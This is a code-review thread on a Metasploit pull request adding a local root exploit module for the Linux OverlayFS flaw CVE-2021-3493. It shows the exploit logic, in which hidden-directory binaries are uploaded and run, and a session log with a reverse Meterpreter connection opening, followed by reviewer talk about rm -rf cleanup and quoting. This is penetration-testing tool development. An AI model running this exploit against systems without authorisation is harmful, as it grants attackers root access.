modules/exploits/linux/local/cve_2021_3493_overlayfs.rb

```diff
@@ -0,0 +1,156 @@
+      return CheckCode::Safe("The target version #{major_version} is outside the vulnerable version range #{lower_bound_version}-#{upper_bound_version}")
+    end
+
+    return CheckCode::Appears
+  end
+
+  def exploit
+    if is_root? && !datastore['ForceExploit']
+      fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override.')
+    end
+    base_dir = datastore['WritableDir'].to_s
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    executable_name = ".#{rand_text_alphanumeric(5..10)}"
+    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    exploit_path = "#{exploit_dir}/#{executable_name}"
+    if file_exist?(exploit_dir)
+      fail_with(Failure::BadConfig, 'Exploit dir already exists')
+    end
+    mkdir(exploit_dir)
+    register_dir_for_cleanup(exploit_dir)
+
+    # Upload exploit
+    arch = kernel_hardware
+    vprint_status("Detected architecture: #{arch}")
+    if (arch.include?('x86_64') && payload.arch.first.include?('aarch')) || (arch.include?('aarch') && !payload.arch.first.include?('aarch'))
+      fail_with(Failure::BadConfig, 'Host/payload Mismatch')
+    end
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      upload_and_compile exploit_path, exploit_source('CVE-2021-3493', 'cve_2021_3493.c')
+    else
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      if arch.include?('x86_64')
+        precompiled_binary = 'cve_2021_3493.x64.elf'
+        vprint_status("Dropping pre-compiled exploit #{precompiled_binary} on system...")
+        upload_and_chmodx exploit_path, exploit_data('CVE-2021-3493', precompiled_binary)
+      elsif arch.include?('aarch64')
+        precompiled_binary = 'cve_2021_3493.aarch64.elf'
+        vprint_status("Dropping pre-compiled exploit #{precompiled_binary} on system...")
+        upload_and_chmodx exploit_path, exploit_data('CVE-2021-3493', precompiled_binary)
+      else
+        print_error('Unknown architecture')
+      end
+
+    end
+    register_file_for_cleanup(exploit_path)
+
+    # Upload payload
+    payload_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx(payload_path, generate_payload_exe)
+
+    # Launch exploit
+    print_status('Launching exploit...')
+    random_string = rand_text_alphanumeric(5..10)
+    args = "#{payload_path} #{exploit_dir} #{random_string}"
+    cmd_string = "#{exploit_path} #{payload_path} #{exploit_dir} #{random_string}"
+    vprint_status("Running: #{cmd_string}")
+    begin
+      output = cmd_exec(exploit_path, args)
+      vprint_status(output)
+    rescue Error => e
+      elog('Caught timeout.  Exploit may be taking longer or it may have failed.', error: e)
+      print_error("Exploit failed: #{e}")
+    ensure
+      # rmdir() fails here on mettle payloads, so I'm just shelling out the rm for the exploit directory.
+      cmd_exec("rm -rf #{exploit_dir}")
```

Comment:
The `rm_rf` library helper method from the `Post::File` mixin is safer. It takes care of quoting and shell meta characters.

Reply:
On second thought, is this necessary?

`register_dir_for_cleanup` is *supposed* to vaporise directories entirely, including all contents, and it is *supposed* to be executed automatically (without the need for this `cmd_exec` call) as `mkdir(exploit_dir)` automatically adds the crated directory to the list of things to be cleaned up.

Reply:
So.... yes.  You are right on both counts.  This _shouldn't_ be necessary, but when we remove it:
```
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 10.5.132.102
[+] Deleted /tmp/.LMWwKe/.A8eUU9O
[*] Meterpreter session 2 opened (10.5.135.101:4444 -> 10.5.132.102:58000 ) at 2021-12-02 09:18:34 -0600
[*] 
[-] Failed to delete /tmp/.LMWwKe: stdapi_fs_delete_dir: Operation failed: 1
[-] Failed to delete /tmp/.LMWwKe: stdapi_fs_delete_dir: Operation failed: 1
```
I expect this is related to:
https://github.com/rapid7/metasploit-framework/issues/13369

Reply:
FWIW,  `rm_rf` appears to use the same underlying calls as the automated cleanup, which fail on mettle currently.

Reply:
> I expect this is related to:
> #13369

Seems likely. Lame.

> FWIW, `rm_rf` appears to use the same underlying calls as the automated cleanup, which fail on mettle currently.

Also lame.

---

In that case:

```suggestion
      cmd_exec("rm -rf '#{exploit_dir}'")
```